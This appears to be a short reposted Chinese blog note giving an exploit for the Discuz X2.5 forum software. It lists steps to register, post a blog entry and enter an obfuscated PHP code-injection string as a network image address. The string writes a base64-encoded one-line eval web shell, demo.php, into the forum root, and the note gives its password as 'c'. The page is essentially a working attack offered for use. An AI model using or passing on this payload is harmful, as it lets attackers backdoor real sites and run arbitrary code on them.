discuz exp 供参考

来源:互联网 发布:sql中distinct 编辑:程序博客网 时间:2024/04/27 19:13

4月7日  discuz  X2.5版本存在此漏洞

1.注册任意账户 

2.登陆用户,发表blog日志(注意是日志) 

3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志,论坛根目录下生成demo.php,一句发密码c


出自:峙酿君edwardz

原创粉丝点击